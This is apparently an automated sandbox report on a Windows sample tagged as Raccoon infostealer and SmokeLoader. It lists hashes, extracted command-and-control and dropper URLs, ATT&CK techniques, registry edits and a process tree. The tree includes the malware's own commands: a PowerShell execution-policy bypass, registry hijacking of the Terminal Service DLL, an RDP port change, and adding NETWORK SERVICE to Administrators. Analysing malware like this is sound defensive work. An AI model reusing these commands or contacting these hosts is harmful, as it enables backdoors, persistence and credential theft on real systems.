raccoon | 22b13294437f3dc3266f4517bf126e7f3b84d96c05f299f41a59887f7710338c

Analysis

max time kernel
151s
max time network
157s
platform
windows10_x64
resource
win10-en-20210920
submitted
19-10-2021 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22c4ade2ee72ea363563416dbb0b28f0.exe
Size

259KB
MD5

22c4ade2ee72ea363563416dbb0b28f0
SHA1

b390af965c6917e886d62b882d1725d3a4ff39af
SHA256

22b13294437f3dc3266f4517bf126e7f3b84d96c05f299f41a59887f7710338c
SHA512

a7b2f134dad8cfe355c65bef6c9c22bab6d989f1eef1637ec6be71b51df705ee445139503cdf97f0b50076550e90336620a031c2925a11c642a18c34fd87d4f1

Score

10^/10

raccoon smokeloader 41060006b048ab05e30c36a645c3317ac285b336 backdoor discovery persistence spyware stealer suricata trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

41060006b048ab05e30c36a645c3317ac285b336

Attributes

url4cnc
http://telegatt.top/agre4fanfinal

http://telegka.top/agre4fanfinal

http://telegin.top/agre4fanfinal

https://t.me/agre4fanfinal

rc4.plain

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3792 created 3212	3792	WerFault.exe	81

suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
74	2444	powershell.exe
76	2444	powershell.exe
77	2444	powershell.exe
78	2444	powershell.exe
80	2444	powershell.exe
82	2444	powershell.exe
84	2444	powershell.exe
86	2444	powershell.exe
88	2444	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
2052	70A8.exe
3212	971C.exe
3988	A527.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0002000000015295-393.dat	upx
behavioral2/files/0x00020000000152d8-394.dat	upx

Deletes itself 1 IoCs

pid	Process
1588	Process not Found

Loads dropped DLL 2 IoCs

pid	Process
1304	Process not Found
1304	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE388.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_h5m1tjac.03k.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE328.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE399.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mahck2vc.f5k.psm1	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE377.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE3A9.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3792	3212	WerFault.exe	81

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	22c4ade2ee72ea363563416dbb0b28f0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	22c4ade2ee72ea363563416dbb0b28f0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	22c4ade2ee72ea363563416dbb0b28f0.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2056	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	80	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	76	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	77	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	78	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2384	22c4ade2ee72ea363563416dbb0b28f0.exe
2384	22c4ade2ee72ea363563416dbb0b28f0.exe
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1588	Process not Found

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
636	Process not Found
636	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2384	22c4ade2ee72ea363563416dbb0b28f0.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1272	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	powershell.exe
Token: SeSecurityPrivilege	3552	powershell.exe
Token: SeTakeOwnershipPrivilege	3552	powershell.exe
Token: SeLoadDriverPrivilege	3552	powershell.exe
Token: SeSystemProfilePrivilege	3552	powershell.exe
Token: SeSystemtimePrivilege	3552	powershell.exe
Token: SeProfSingleProcessPrivilege	3552	powershell.exe
Token: SeIncBasePriorityPrivilege	3552	powershell.exe
Token: SeCreatePagefilePrivilege	3552	powershell.exe
Token: SeBackupPrivilege	3552	powershell.exe
Token: SeRestorePrivilege	3552	powershell.exe
Token: SeShutdownPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeSystemEnvironmentPrivilege	3552	powershell.exe
Token: SeRemoteShutdownPrivilege	3552	powershell.exe
Token: SeUndockPrivilege	3552	powershell.exe
Token: SeManageVolumePrivilege	3552	powershell.exe
Token: 33	3552	powershell.exe
Token: 34	3552	powershell.exe
Token: 35	3552	powershell.exe
Token: 36	3552	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeShutdownPrivilege	1588	Process not Found
Token: SeCreatePagefilePrivilege	1588	Process not Found
Token: SeShutdownPrivilege	1588	Process not Found
Token: SeCreatePagefilePrivilege	1588	Process not Found
Token: SeShutdownPrivilege	1588	Process not Found
Token: SeCreatePagefilePrivilege	1588	Process not Found
Token: SeIncreaseQuotaPrivilege	1644	powershell.exe
Token: SeSecurityPrivilege	1644	powershell.exe
Token: SeTakeOwnershipPrivilege	1644	powershell.exe
Token: SeLoadDriverPrivilege	1644	powershell.exe
Token: SeSystemProfilePrivilege	1644	powershell.exe
Token: SeSystemtimePrivilege	1644	powershell.exe
Token: SeProfSingleProcessPrivilege	1644	powershell.exe
Token: SeIncBasePriorityPrivilege	1644	powershell.exe
Token: SeCreatePagefilePrivilege	1644	powershell.exe
Token: SeBackupPrivilege	1644	powershell.exe
Token: SeRestorePrivilege	1644	powershell.exe
Token: SeShutdownPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeSystemEnvironmentPrivilege	1644	powershell.exe
Token: SeRemoteShutdownPrivilege	1644	powershell.exe
Token: SeUndockPrivilege	1644	powershell.exe
Token: SeManageVolumePrivilege	1644	powershell.exe
Token: 33	1644	powershell.exe
Token: 34	1644	powershell.exe
Token: 35	1644	powershell.exe
Token: 36	1644	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeIncreaseQuotaPrivilege	2196	powershell.exe
Token: SeSecurityPrivilege	2196	powershell.exe
Token: SeTakeOwnershipPrivilege	2196	powershell.exe
Token: SeLoadDriverPrivilege	2196	powershell.exe
Token: SeSystemProfilePrivilege	2196	powershell.exe
Token: SeSystemtimePrivilege	2196	powershell.exe
Token: SeProfSingleProcessPrivilege	2196	powershell.exe
Token: SeIncBasePriorityPrivilege	2196	powershell.exe
Token: SeCreatePagefilePrivilege	2196	powershell.exe
Token: SeBackupPrivilege	2196	powershell.exe
Token: SeRestorePrivilege	2196	powershell.exe
Token: SeShutdownPrivilege	2196	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1588	Process not Found
1588	Process not Found

Suspicious use of SendNotifyMessage 5 IoCs

pid	Process
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found
1588	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1588 wrote to memory of 2052	1588	Process not Found	73
PID 1588 wrote to memory of 2052	1588	Process not Found	73
PID 2052 wrote to memory of 1272	2052	70A8.exe	75
PID 2052 wrote to memory of 1272	2052	70A8.exe	75
PID 1272 wrote to memory of 1936	1272	powershell.exe	77
PID 1272 wrote to memory of 1936	1272	powershell.exe	77
PID 1936 wrote to memory of 2012	1936	csc.exe	78
PID 1936 wrote to memory of 2012	1936	csc.exe	78
PID 1272 wrote to memory of 3552	1272	powershell.exe	79
PID 1272 wrote to memory of 3552	1272	powershell.exe	79
PID 1588 wrote to memory of 3212	1588	Process not Found	81
PID 1588 wrote to memory of 3212	1588	Process not Found	81
PID 1588 wrote to memory of 3212	1588	Process not Found	81
PID 1272 wrote to memory of 1644	1272	powershell.exe	83
PID 1272 wrote to memory of 1644	1272	powershell.exe	83
PID 1588 wrote to memory of 3988	1588	Process not Found	85
PID 1588 wrote to memory of 3988	1588	Process not Found	85
PID 1588 wrote to memory of 3988	1588	Process not Found	85
PID 1272 wrote to memory of 2196	1272	powershell.exe	87
PID 1272 wrote to memory of 2196	1272	powershell.exe	87
PID 1272 wrote to memory of 3396	1272	powershell.exe	91
PID 1272 wrote to memory of 3396	1272	powershell.exe	91
PID 1272 wrote to memory of 2056	1272	powershell.exe	92
PID 1272 wrote to memory of 2056	1272	powershell.exe	92
PID 1272 wrote to memory of 2444	1272	powershell.exe	93
PID 1272 wrote to memory of 2444	1272	powershell.exe	93
PID 1272 wrote to memory of 3592	1272	powershell.exe	94
PID 1272 wrote to memory of 3592	1272	powershell.exe	94
PID 3592 wrote to memory of 3580	3592	net.exe	95
PID 3592 wrote to memory of 3580	3592	net.exe	95
PID 1272 wrote to memory of 4060	1272	powershell.exe	96
PID 1272 wrote to memory of 4060	1272	powershell.exe	96
PID 4060 wrote to memory of 3708	4060	cmd.exe	97
PID 4060 wrote to memory of 3708	4060	cmd.exe	97
PID 3708 wrote to memory of 1424	3708	cmd.exe	98
PID 3708 wrote to memory of 1424	3708	cmd.exe	98
PID 1424 wrote to memory of 2000	1424	net.exe	99
PID 1424 wrote to memory of 2000	1424	net.exe	99
PID 1272 wrote to memory of 2252	1272	powershell.exe	100
PID 1272 wrote to memory of 2252	1272	powershell.exe	100
PID 2252 wrote to memory of 3096	2252	cmd.exe	101
PID 2252 wrote to memory of 3096	2252	cmd.exe	101
PID 3096 wrote to memory of 3056	3096	cmd.exe	102
PID 3096 wrote to memory of 3056	3096	cmd.exe	102
PID 3056 wrote to memory of 3736	3056	net.exe	103
PID 3056 wrote to memory of 3736	3056	net.exe	103
PID 3500 wrote to memory of 668	3500	cmd.exe	107
PID 3500 wrote to memory of 668	3500	cmd.exe	107
PID 668 wrote to memory of 1072	668	net.exe	108
PID 668 wrote to memory of 1072	668	net.exe	108
PID 3848 wrote to memory of 2744	3848	cmd.exe	111
PID 3848 wrote to memory of 2744	3848	cmd.exe	111
PID 2744 wrote to memory of 3396	2744	net.exe	112
PID 2744 wrote to memory of 3396	2744	net.exe	112
PID 2056 wrote to memory of 1972	2056	cmd.exe	115
PID 2056 wrote to memory of 1972	2056	cmd.exe	115
PID 1972 wrote to memory of 2372	1972	net.exe	118
PID 1972 wrote to memory of 2372	1972	net.exe	118
PID 4056 wrote to memory of 844	4056	cmd.exe	119
PID 4056 wrote to memory of 844	4056	cmd.exe	119
PID 844 wrote to memory of 2328	844	net.exe	123
PID 844 wrote to memory of 2328	844	net.exe	123
PID 3600 wrote to memory of 3200	3600	cmd.exe	120
PID 3600 wrote to memory of 3200	3600	cmd.exe	120

C:\Users\Admin\AppData\Local\Temp\22c4ade2ee72ea363563416dbb0b28f0.exe
"C:\Users\Admin\AppData\Local\Temp\22c4ade2ee72ea363563416dbb0b28f0.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2384

C:\Users\Admin\AppData\Local\Temp\70A8.exe
C:\Users\Admin\AppData\Local\Temp\70A8.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1272
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i5lloxgb\i5lloxgb.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86DF.tmp" "c:\Users\Admin\AppData\Local\Temp\i5lloxgb\CSCDB210062FFC440A2A3D4A47A8F313F86.TMP"
      4⤵
      PID:2012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3396
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:2056
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2444
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3708
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1424
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2000
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2252
